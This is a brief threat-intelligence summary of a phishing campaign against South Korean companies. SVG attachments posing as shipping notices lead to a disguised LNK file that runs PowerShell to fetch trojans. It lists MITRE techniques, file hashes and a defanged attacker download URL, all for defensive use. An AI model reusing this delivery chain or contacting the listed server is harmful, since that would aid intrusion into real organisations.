This report discusses a phishing attack targeting domestic companies in South Korea, utilizing SVG format malware disguised as shipping notifications. By embedding malicious SVG files in emails, attackers exploit security weaknesses to execute malware, ultimately leading to the download of trojan files. Affected: domestic companies, shipping sector
Keypoints :
- SVG format malware is being disseminated through phishing emails that appear to be legitimate shipping notifications.
- The SVG format is exploited as it is commonly recognized as an image file, making it harder for security software to detect malicious content.
- When users open the attached SVG file, it triggers the download of a covert ZIP file.
- The ZIP file contains a LNK file that masquerades as a PDF, which, when opened, executes a PowerShell script to download additional malicious files.
- Downloaded files are disguised in various formats, including EXE, and are designed to maintain persistence and connect to the attacker’s server.
- The malware has been detected by security software as Trojan.Downloader.Agent and Trojan.Agent.LNK.Gen.
MITRE Techniques :
- Initial Access (T1566): Phishing emails were utilized to deliver SVG format malware.
- Execution (T1059.001): PowerShell was executed from a LNK file to run malicious scripts.
- Persistence (T1547.001): The malware created scheduled tasks to maintain persistence.
- Command and Control (T1071.001): The malware attempted to connect to URLs controlled by the attacker.
Indicator of Compromise :
- [Hash] A3A8D891D839DB85458419619B343394
- [Hash] 51B32CB26E24D82343D96B75E7DD6CD2
- [Hash] BC0B9E071041B9DFE3B4FF9B60EEC0FA
- [Hash] 3983983CBE707A6B657F0F65CB350424
- [URL] hxxp://87.121.79.103/download/08e8215ab5224845b5d3298a95e47c0a.txt
Full Story: https://alyacofficialblog.tistory.com/5536